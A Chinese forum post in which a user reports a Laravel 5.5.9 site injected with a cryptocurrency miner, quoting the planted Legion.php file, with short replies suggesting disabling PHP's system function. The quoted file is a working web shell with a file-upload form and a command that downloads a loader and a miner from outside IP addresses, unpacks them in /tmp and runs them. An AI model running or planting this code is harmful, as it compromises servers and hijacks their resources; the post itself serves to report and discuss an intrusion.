网站被注入挖矿程序

当前Larvel版本是5.5.9

<?php echo '<center><h1>LEGION EXPLOIT V4 (Năvodari Power)</h1>' . '<br>' . '[uname] ' . php_uname() . ' [/uname] ';
echo '<form method="post"enctype="multipart/form-data">';
echo '<input type="file"name="file"><input name="_upl"type="submit"value="Upload"></form>';
if ($_POST['_upl'] == "Upload") {
    if (@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
        echo '<b>LEGION Exploit Success!</b>';
    } else {
        echo '<b>LEGION Exploit Success!</b>';
    }
}
system('curl -s -k 2.57.122.112/rce/load -o adindex.php; cd /tmp; curl -O 91.210.168.80/miner.jpg; tar xzvf miner.jpg > /dev/null; rm -rf miner.jpg; cd .x; ./x > /dev/null');
?>

对方通过Legion这个扫描工具,在public目录下写入上面这Legion.php

《L01 基础入门》
我们将带你从零开发一个项目并部署到线上,本课程教授 Web 开发中专业、实用的技能,如 Git 工作流、Laravel Mix 前端工作流等。
《L05 电商实战》
从零开发一个电商项目,功能包括电商后台、商品 & SKU 管理、购物车、订单管理、支付宝支付、微信支付、订单退款流程、优惠券等
讨论数量: 5

禁用 system 函数

2年前 评论
happyqian_ah (楼主) 2年前

我现在只有 0.00001 个 BTC

file

2年前 评论
haodudecao 2年前

讨论应以学习和精进为目的。请勿发布不友善或者负能量的内容,与人为善,比聪明更重要!